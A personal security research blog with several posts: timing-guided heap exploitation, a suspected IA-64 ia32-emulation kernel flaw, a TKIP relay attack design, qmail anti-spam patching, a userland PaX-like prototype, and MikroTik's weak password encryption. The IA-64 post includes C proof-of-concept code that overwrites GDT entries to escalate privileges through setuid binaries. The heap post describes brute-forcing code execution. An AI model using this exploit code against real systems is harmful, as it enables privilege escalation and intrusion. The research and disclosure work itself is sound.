This is where I put up my thoughts / random notes on things, and whatever I feel like at the point in time. Usually it will be security focused.

For those who are curious, I used the asciidoc package to generate this website, as I don't have too much motivation to write a page out in html syntax and make it look pretty. Thanks to Steven for his script to generate rss feeds from this page structure. Here's the shell script that makes all the html pages for me.

Timing attacks and heap exploitation

(added 17/10/2009)

While recently working on a heap overflow, I wanted to be able to exploit remote unknown targets that have executable memory. Just for completeness, Exec-shield and PaX would not have prevented exploitation on the distro's I checked, they just required a couple more offsets. Oh, and -D_FORTIFY_SOURCE=2 does not help either.

Anyways, the vulnerability has some specialities which make it slightly more fun than normal.. During input processing, the heap layout can change considerably, with enough massaging, you can either overwrite a structure with a pointer to a structure which has a function pointer, or cause it to write some data we semi control to a pointer we can control. Given the situation, both are relatively easy to exploit, although read only GOT entries will make the latter method harder against unknown targets. (There are function pointers on the .bss, however it requires a lot more massaging and/or luck to hit in that regards).

Because trying X input strings (where X should allow you to hit it with Y probability) for each address would end up being a lot of attempts / crashes, it would be better to try and isolate a single suitable input strings, then loop over potential memory ranges looking for our code. However, the question then is, "Is it feasible to do so?"

In the case of this particular vulnerability, it is feasible to do that via using information gained from how long it takes to shut down the socket / remote process to crash. The information we gather from this is the time between sending the string, and how long it takes for the socket to shut down, which relates to how much processing was done in the remote process.

If it closes very quickly, it implies we have hit a exit(1) code path due to the heap modification early on. If it takes too long, we've hit another exit(1) code path, but after it's done a lot of heap processing first.

If it hits a little bit before our time, it usually means the massaging was off a little bit, a bit after tends to mean the same.. However, there's enough difference to usually identify the ideal case.

Of course, using timing information is only useful in certain situations (ideally, you're close to the target machine, low/little load on each end, network load is low/lowish).. those challenges can be reduced though by owning a machine close to your target. Also it helps if the vulnerability you're targetting gives you useful timing information.

The below graph information was generated via:

trigger_str = generate_potential_trigger_string()
start = time.time()
skt.send(trigger_str)
rlist, wlist, xlist = select.select([skt], [], [skt], 1.0)
stop = time.time()
difference = stop - start

and doing that 200 times, sorting, and putting the results into a text file, and having gnuplot graph it for us.

While it could probably be argued that python isn't ideal for gathering such precise timing information, we'll ignore that for now. It's working for this demonstration, which is all I care about :p

In the below graph, red crosses are "uninteresting", and green ones are "interesting". The "interesting" state is a crash that's directly related to the function pointer cleanup code. The blue dot is a crash relating to memset() (usually a pointer we control), and purple is an "other" crash (usually due to our pointer not being aligned properly due to allocation layout).

http://felinemenace.org/~andrewg/Timing_attacks_and_heap_exploitation/all_results.png

The above graph paints an interesting picture.. at the beginning, there are some very early exit(1) codepaths, then more around the below the 0.005 time marker.. At around the 0.005 and 160 intersect, we start getting crashes due to our input corrupting the processes heap (blue/purple/green) in a useful way and taking successively longer to crash.

Once we have one of the green crashes, we can use that to bruteforce the section of memory that will lead to code execution.

In closing, I hope this brief article shows some of the benefits that timing can provide when suitable and when exploiting targets when you have little information available.

Random Update

(added 11/10/2009)

This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation.. but here goes:

Potential arch/ia64/ia32/ bug

(started around 23/5/2008)

While recently doing some random research, I was browsing the linux 2.6.25.2 kernel source, in arch/ia64/ia32/. While I was reading over the binfmt_elf32.c file, I stumbled across an interesting comment in the function ia64_elf32_init():

/*
 * Map GDT below 4GB, where the processor can find it.  We need to map
 * it with privilege level 3 because the IVE uses non-privileged accesses to these
 * tables.  IA-32 segmentation is used to protect against IA-32 accesses to them.
 */

I thought it was particularly interesting in how they mentioned that segmentation would be used to protect access and modification of the applicable data.

Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have a IA64 with IA32 linux emulation feel free to test and report back to me, I'd be interested in finding out :)

Memory layout

The code seems to lay memory out with a 3GB, with a couple of pages above the 3GB mark for GDT, LDT, and TSS.

From the ia32priv.h file, we have:

#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE

/*
 * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the
 * IA-32 engine can
 * access them.
 */
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

Where IA32_PAGE_OFFSET #define'd to 0xc0000000 in include/asm-ia64/ia32.h.

So how can we access the data

There appears to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and uses it in way, such as read() or write(). Additionally, we can directly modify the data via creating a new descriptor and setting the limit to 4GB (which can be done via the modify_ldt() syscall).

Using the read() / write() mechanism is probably the best way to manipulate the data, and probably most flexible.

Creating a new descriptor is easy enough, the below code shows how to:

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/ldt.h>
#include <stdio.h>

#define TYPE user_desc // modify_ldt_ldt_s for 2.4

int do_ldt(int num, unsigned long base, int type)
{
        struct TYPE ldt_entry = {
                num, // entry_number
                (unsigned long int) (base), // base_address
                0xfffff, // limit, 4G
                1, // seg_32bit
                type, // contents
                0, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct TYPE)) == 0;
}

int main(int argc, char **argv)
{
        if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
                printf("Failed to modify the ldt\n");
                exit(EXIT_FAILURE);
        }
        // the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
        __asm__ volatile("pushw $7;\
                          popw %ds;");
        printf("We've changed our ds segment descriptor\n");
}

If the above code is being compiled on a 2.4 kernel, the struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done via changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32 bit mode, and appropriate emulation options/modules are active.

The code in 2.6.25.2 doesn't do any checking in what memory is now accessible in ia32_ldt.cwrite_ldt() function.

Proof of concept

I'd like to repeat again that I don't have access to a IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)

Dumping descriptor tables

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>

#define PAGE_SIZE               4096
#define IA32_PAGE_OFFSET        0xc0000000
//#define IA32_PAGE_OFFSET      (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

unsigned char *x;

int main(int argc, char **argv)
{
        int fd;

        fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open gdt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped GDT\n");

        fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open tss.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, IA32_TSS_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped TSS\n");

        fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open ldt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, IA32_LDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped LDT\n");
}

Gaining ring0

After thinking about it a little bit, there may be little point in getting ring0 itself, but I haven't completely read through the itanium manuals.

According to the docs I've read so far, io ports need to be explicitly mapped in by the operating system, and enabled. Other "privileged" instructions generate traps.

If ring0 would be useful in some capacity, it could be gained by setting appropriate LDT entries if needed, and overwriting the TSS saved CS register and modifying the privilege level.

Privilege escalation

However, there would be a way to gain additional privileges if there exists a setuid root x86 binary installed on the system. This would be done via manipulating the GDT base address so that upon execve() of a suid process, the entry point would end up pointing to custom code (probably on the stack), due to segmentation base. From what I've read of the itanium manual, segmentation is used to calculate the real address it accesses (ala x86)

Setting the GDT base would also have the side effect of probably crashing any existing IA32 processes.

Theory:

Randomisation probably won't be an issue due to the personality() syscall :)

Initial entry point will be the entry point in the binary if it's not dynamically linked, if it's dynamic linked, the loaders initial entry point will be the entry point.

Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on a x86 box.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>

#define PAGE_SIZE               4096
#define IA32_PAGE_OFFSET        0xc0000000
//#define IA32_PAGE_OFFSET      (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

#define __USER_CS      0x23
#define __USER_DS      0x2B


unsigned char *x;

/* borrowed from arch/ia64/ia32/ia32priv.h */

#define IA32_PAGE_SHIFT                        12      /* 4KB pages */

#define __USER_CS      0x23
#define __USER_DS      0x2B

#define IA32_SEG_BASE           16
#define IA32_SEG_TYPE           40
#define IA32_SEG_SYS            44
#define IA32_SEG_DPL            45
#define IA32_SEG_P              47
#define IA32_SEG_HIGH_LIMIT     48
#define IA32_SEG_AVL            52
#define IA32_SEG_DB             54
#define IA32_SEG_G              55
#define IA32_SEG_HIGH_BASE      56

#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
               (((limit) & 0xffff)                                                              \
                | (((unsigned long) (base) & 0xffffff) << IA32_SEG_BASE)                        \
                | ((unsigned long) (segtype) << IA32_SEG_TYPE)                                  \
                | ((unsigned long) (nonsysseg) << IA32_SEG_SYS)                                 \
                | ((unsigned long) (dpl) << IA32_SEG_DPL)                                       \
                | ((unsigned long) (segpresent) << IA32_SEG_P)                                  \
                | ((((unsigned long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT)              \
                | ((unsigned long) (avl) << IA32_SEG_AVL)                                       \
                | ((unsigned long) (segdb) << IA32_SEG_DB)                                      \
                | ((unsigned long) (gran) << IA32_SEG_G)                                        \
                | ((((unsigned long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */

int main(int argc, char **argv)
{
        int fd;
        unsigned char scratch[4096];
        unsigned long long *gdt = (unsigned long *)(scratch);
        unsigned long long entry_point;

        if(argc != 2) {
                printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
                printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
                printf("--> offset probably needs to be aligned so it can be shifted\n");
                printf("--> in hex\n");
                exit(EXIT_FAILURE);
        }

        entry_point = strtoul(argv[1], 0, 16);

        fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
        unlink("gdt.bin");
        if(fd == -1) {
                printf("Failed to open gdt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        printf("--> Dumped GDT\n");
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek to start of fd\n");
                exit(EXIT_FAILURE);
        }
        if(read(fd, scratch, 4096) != 4096) {
                printf("Unable to read 4096 bytes from our fd\n");
                exit(EXIT_FAILURE);
        }
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek to start of fd\n");
                exit(EXIT_FAILURE);
        }

        // borrowed from ia32_support.c :P, but modified
        gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
                0xb, 1, 3, 1, 1, 1, 1);

        if(write(fd, scratch, 4096) != 4096) {
                printf("Unable to write modified data back\n");
                exit(EXIT_FAILURE);
        }
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek backwards\n");
                exit(EXIT_FAILURE);
        }
        printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
        if(read(fd, IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to read() 4096 bytes :(\n");
                exit(EXIT_FAILURE);
        }
        printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
        close(fd);

}

At any rate, spender tested the code up to dumping GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() if it is made read only at some stage).

At any rate, I haven't been able to test due to lack of access to hardware :p

TKIP Conspiracy fun

(started 14/12/2008)

When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker controlled machine on the internet to help "conspire" against the client station.

By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:

Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
                     vulnerable ports (139/445/80/23/etc), with source IP of
                     an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
                    UIP connection structure, and fixes up the seq/ack
                    numbers. Machine then creates a local socket, and buffers
                    the data between local socket, and UIP connection to the
                    attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
                     standard exploits

This type of attack is highly dependant on the network infrastructure in use.. outgoing SYN|ACK's may not be NAT'd properly in NAT environments (due to no incoming SYN seen), firewalls may not allow outgoing connections, with an additional complication that the client attacked may have a firewall enabled, etc.

Anti-spam with Gentoo's netqmail package.

(added 5/4/2009)

Recently I was asked to help admin a box (amongst other things).. one of the particular concerns was the amount of incoming spam to the box. Usually, I would use postfix + various settings to handle e-mail, but the other admin's wanted to keep qmail.

The box itself is running Gentoo Hardened, with qmail. At some stage, a custom qmail was configured — I wanted to return to using the gentoo packaging system to take care of that for me. After finding out it was patched with something to verify RCPT TO headers against (as opposed to accepting mail for every possible email address at a given domain, then sending bounce messages), I looked for something suitable, and came across this patch. Please see this website for further information.

Unfortunately, the patch didn't require cleanly, so that was fixed. This patch is available here if you want it. It was modified to use /var/qmail/control/moregoodrcptto.cdb as opposed to it's default, as that's how this system I was helping was configured.

Additionally, I wanted SPF verification / rejecting if sending host is authorized. I found a suitable patch here, which (as you guessed) didn't apply cleanly. The updated patch is available here.

Please see the respective websites for more information / configuration changes you may need to make.

In order to use these with Gentoo, you can do the following:

# mkdir /root/qmail_patches
# cd /root/qmail_patches
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/1_rcptto.patch
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/2_spf_filtering.patch
# echo QMAIL_PATCH_DIR="/root/qmail_patches" >> /etc/make.conf
# emerge netqmail

At which point it will compile netqmail with the patches in /root/qmail_patches.

Additionally, I enabled rblsmtpd in /var/qmail/control/conf-smtpd, via uncommenting and editing the QMAIL_SMTP_PRE variable, to the following:

QMAIL_SMTP_PRE="${QMAIL_SMTP_PRE} rblsmtpd -r sbl-xbl.spamhaus.org"

And, well, that's the end of the changes. If you're looking for anti-spam stuff, I'd suggest you use Postfix, as it's still being developed, and doesn't require random patching to get simple functionality working :-)

Pseudo-PaX-in-userland

(started 4/5/2008, added 5/5/2008)

This document describes how it could feasible to implement a pseudo PaX implementation, completely in userland. The described idea is far more of a play thing, than anything completely serious, for reasons later described. It's more of just random thoughts and experiments.

I don't recall how I got started along this track, except that it was something I've been meaning to look at for a while.

Introduction

Firstly, we should review how PaX's segmexec operates.

   While Linux effectively does not use segmentation by creating 0 based and
   4 GB limited segments for both code and data accesses (therefore logical
   addresses are the same as linear addresses), it is possible to set up
   segments that allow to implement non-executable pages.

   The basic idea is that we divide the 3 GB userland linear address space
   into two equal halves and use one to store mappings meant for data access
   (that is, we define a data segment descriptor to cover the 0-1.5 GB linear
   address range) and the other for storing mappings for execution (that is,
   we define a code segment descriptor to cover the 1.5-3 GB linear address
   range). Since an executable mapping can be used for data accesses as well,
   we will have to ensure that such mappings are visible in both segments
   and mirror each other. This setup will then separate data accesses from
   instruction fetches in the sense that they will hit different linear
   addresses and therefore allow for control/intervention based on the access
   type. In particular, if a data-only (and therefore non-executable) mapping
   is present only in the 0-1.5 GB linear address range, then instruction
   fetches to the same logical addresses will end up in the 1.5-3 GB linear
   address range and will raise a page fault hence allow detecting such
   execution attempts.

PaX's segmexec works by modifying the Global Descriptor Table which separates code and data requests to different virtual addresses.

Userspace, as far as I know, can't modify the Global Descriptor Table, but it can influence it's own Local Descriptor Table via the modify_ldt() system call. The modify_ldt() syscall can create code and data descriptors easily enough, and we can use call far and return far (amongst other techniques) to change into that selector.

Proof of concept

As a sample, let's try and execute a int3 instruction. We'll create a new LDT entry, with a base address of 4096, which means all CS addresses after that's set, has to be subtracted by 4096. And on with the show:

#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>

asm(".globl debug;\
        .type   debug, @function;\
debug:;\
        int3;\
.size   exit, .-exit;\
        "
        );

extern void debug();

/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
        unsigned int  entry_number;
        unsigned long base_addr;
        unsigned int  limit;
        unsigned int  seg_32bit:1;
        unsigned int  contents:2;
        unsigned int  read_exec_only:1;
        unsigned int  limit_in_pages:1;
        unsigned int  seg_not_present:1;
        unsigned int  useable:1;
};

#define MODIFY_LDT_CONTENTS_DATA        0
#define MODIFY_LDT_CONTENTS_STACK       1
#define MODIFY_LDT_CONTENTS_CODE        2
*/

int do_ldt(int num, unsigned long base, int type)
{
        struct modify_ldt_ldt_s ldt_entry = {
                num, // entry_number
                (unsigned long int) (base), // base_address
                0xfffff, // limit, 4G or so :p
                1, // seg_32bit
                type, // contents
                1, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}

int main(int argc, char **argv)
{
        short int seg;

        if(do_ldt(0, 0x1000, MODIFY_LDT_CONTENTS_CODE) == 0) {
                printf("Failed to modify ldt\n");
                exit(EXIT_FAILURE);
        }
        seg = 7; // (0 * 8) + 7
        //printf("new segment: %d|%02x\n", seg, seg);

        __asm__ volatile("pushw %0;\
                        pushl %1;\
                        lret"
                        :
                        : "r" (seg), "r" ((unsigned int)(debug) - 0x1000)
                        );

}

Running the above code under a debugger:

Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGTRAP, Trace/breakpoint trap.
0x08047559 in ?? ()
(gdb) x/4i $eip -1
0x8047558:      Cannot access memory at address 0x8047558
(gdb) x/4i $eip - 1 + 4096
0x8048558 <debug>:      int3
0x8048559 <do_ldt>:     push   %ebp
0x804855a <do_ldt+1>:   mov    %esp,%ebp
0x804855c <do_ldt+3>:   sub    $0x48,%esp
(gdb) i r cs
cs             0x7      7

As we can see in the debugger output, it's possible to set a custom CS descriptor, and execute code. Due to the now non-flat memory address space, it also messes with debugging a little bit.

Implementing the Pseduo-PaX

Quickly reviewing what we need to do:

Doing the above completely correctly would be difficult from userland, but possible if a bit of effort was to be expended.

For the purposes of this article, we'll write it using dietlibc, and make it not that feasible to use.

#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
#include <sys/mman.h>
#include <asm/unistd.h>


/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
        unsigned int  entry_number;
        unsigned long base_addr;
        unsigned int  limit;
        unsigned int  seg_32bit:1;
        unsigned int  contents:2;
        unsigned int  read_exec_only:1;
        unsigned int  limit_in_pages:1;
        unsigned int  seg_not_present:1;
        unsigned int  useable:1;
};

#define MODIFY_LDT_CONTENTS_DATA        0
#define MODIFY_LDT_CONTENTS_STACK       1
#define MODIFY_LDT_CONTENTS_CODE        2
*/

_syscall3(int,modify_ldt,int,op,void*,what,int,len);

/*int modify_ldt(int op, void *what, int len)
{
        return syscall(__NR_modify_ldt, op, what, len);
}*/


int do_ldt(int num, unsigned long base, int type)
{
        struct modify_ldt_ldt_s ldt_entry = {
                num, // entry_number
                (unsigned long int) (base), // base_address
                0x5ffff, // limit, 1.5G or so :p
                1, // seg_32bit
                type, // contents
                1, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}

int do_exit()
{
        exit(EXIT_SUCCESS);
}

void vulnerable()
{
        int j[1];
        int i;
        char code[] = "\xcc\xcc\xcc\xcc";
#ifdef HEAP
        int addr = strdup(code);
#else
        int addr = &code;
#endif
        //char *where;
        //__asm__("int3;");
        for(i = 0; i < 10; i++) j[i] = (unsigned int)(addr);
}

unsigned char *old_stack;
int old_stack_len;

void duplicate_code_mappings()
{
        // taken from drifter level 11 code, but modified.
        FILE *f;
        int hi, low;
        char flags[5];
        int wot;
        int major, minor;
        int size;
        char remainder[1024];
        int ret;
        unsigned char *new;

        f = fopen("/proc/self/maps", "r");

        while(8 == (ret = fscanf(f, "%08x-%08x %[^ \n] %08x %02x:%02x %08x%[^\n]", &low, &hi, flags, &wot, &major, &minor, &size, remainder))) {
                if((low & 0x60000000) == 0x60000000) continue;

                size = hi - low;
                /*
                 * size = hi - low;
                 * printf("--> %08x-%d\n", low, size);
                printf("--> %08x-%08x %s %d %d:%d %d %s\n", low, hi, flags, wot, major, minor, size, remainder);
                 */

                // r-xp
                if(flags[1] == '-' && flags[2] == 'x') {
                        printf("--> Duplicating 0x%08x, %d bytes long\n", low, size);

                        new = mmap(low+0x60000000, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
                        if(new == MAP_FAILED) {
                                printf("Unable to map code duplicate: %s\n", strerror(errno));
                                exit(EXIT_FAILURE);
                        }
                        memcpy(new, low, size);
                        mprotect(new, size, PROT_READ|PROT_EXEC);
                }
                old_stack = low;
                old_stack_len = size;
        }
        fclose(f);

        //exit(EXIT_FAILURE);
}


#define STKSIZ (4096 * 32)
// more code from drifter level11.. so I'm lazy :P

unsigned char *allocate_stack()
{
        int found;
        int address;
        short int shift;
        unsigned char *stack_ptr;
        int urand_fd;

        urand_fd = open("/dev/urandom", O_RDONLY);

        found = 0;
        while(!found) {
                if(read(urand_fd, &address, 4) != 4) {
                        printf("Read failure on /dev/urandom: %s\n", strerror(errno));
                        exit(EXIT_FAILURE);
                }

                if(read(urand_fd, &shift, 2) != 2) {
                        printf("Read failure on /dev/urandom: %s\n", strerror(errno));
                        exit(EXIT_FAILURE);
                }

                shift &= 4088; // (page_size - 1) - last 4 bits, to align stack

#if 1
                address &= 0x5f7fffff; // remove everything except for last 8M of address space
                //address |= TOOBIG;
#endif
                address &= ~4095;       // clear page addr

                stack_ptr = mmap(address, STKSIZ, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
                if(stack_ptr != MAP_FAILED) found = 1;

        }

        close(urand_fd);

        stack_ptr = (unsigned int)(stack_ptr) + (STKSIZ) - shift;
        memset(stack_ptr, 0xcc, shift);

        stack_ptr--;
        return stack_ptr;
}

void do_vulnerable()
{
        munmap(old_stack, old_stack_len);
        printf("Hello from do_vulnerable\n");
        vulnerable();
        do_exit();
}

int main(int argc, char **argv)
{
        short int seg;
        unsigned char *stack;

        if(do_ldt(0, 0x60000000, MODIFY_LDT_CONTENTS_CODE) == 0) {
                printf("Failed to modify ldt\n");
                exit(EXIT_FAILURE);
        }
        seg = 7;

        duplicate_code_mappings();
        stack = allocate_stack();

        printf("--> Will unmap old stack starting @ 0x%08x\n", old_stack);
        system("cat /proc/$PPID/maps");

        printf("Returning to do_vulnerable\n");

        __asm__ volatile("movl %0, %%esp;\
                        movl %%esp, %%ebp;\
                        pushl %1;\
                        pushw %2;\
                        pushl %3;\
                        lret"
                        :
                        : "m"(stack), "m" (do_exit), "r" (seg), "r" ((unsigned int)(do_vulnerable))
                        );

}

The above was compiled with:

diet gcc -fno-pie -fno-stack-protector ldt_test.c -o ldt_test

The above code creates a new stack mapping (because the original is mapped somewhere around 0xbfff0000) and allocates underneath the cutoff point, in addition, it duplicates code layout via scanning /proc/self/maps for mappings marked executable, and NOT writable.

The vulnerable() function stimulates a stack overflow, pointing to the int3 instruction. Optionally, it can be compiled with -DHEAP, and it will stimulate a heap return address, rather than a stack return address.

Watching it catch heap execute attempts:

GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfffc000
00110000-00111000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50639      /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50639      /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
0d2a4000-0d2c4000 rw-p 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfffc000-c0000000 rwxp ffffd000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable

Program received signal SIGSEGV, Segmentation fault.
0x00111008 in ?? ()
(gdb) x/4i $eip
0x111008:       int3
0x111009:       int3
0x11100a:       int3
0x11100b:       int3

And stack execution attempts:

GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfff4000
00110000-00111000 rw-p 00000000 00:00 0
063c3000-063e3000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50635      /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50635      /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfff4000-c0000000 rwxp ffff5000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable

Program received signal SIGSEGV, Segmentation fault.
0x063e25b1 in ?? ()
(gdb) x/4i $eip
0x63e25b1:      int3
0x63e25b2:      int3
0x63e25b3:      int3
0x63e25b4:      int3

Implementing it properly

This idea would be easily implemented in the ELF loader (ld.so, not kernel) if it laid out the memory correctly, and probably remapped the stack to a lower address. It would also have to hook stuff like mmap() and duplicate it if possible/applicable.

Anonymous memory could possibly be handled via making it disk backed, and mapping twice from that.

As opposed to memcpy, it should correctly parse /proc/<pid>/maps, and mmap() from shared libraries correctly.

Dynamically generated code could be handled by marking segments non writable, when attempting to execute them. On attempts to write there again, it would be unmapped from the executable region, and marked writable again. Self modifying code would be handled via this mechanism, albeit slowly.

Weaknesses

Other uses for modify_ldt() syscall

MikroTik Router Security Analysis: Weak password storage / encryption

(added 3/1/2008)

On the 3rd January, manio [at] skyboo [dot] net e-mailed me asking for some hints / tips / advice about how the passwords are stored in the MikroTik Router OS image. (To his credit, he said he realised it was XOR based pretty much after he hit sent the mail). The user/password information is stored in /nova/store/user.dat. His homepage is http://manio.skyboo.net/mikrotik/.

According to him, the following passwords had the following encrypted text:

zero length pw  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0               78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
aaa             29 D3 BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
ala             29 DE BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
0000            48 8F EE 36 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01

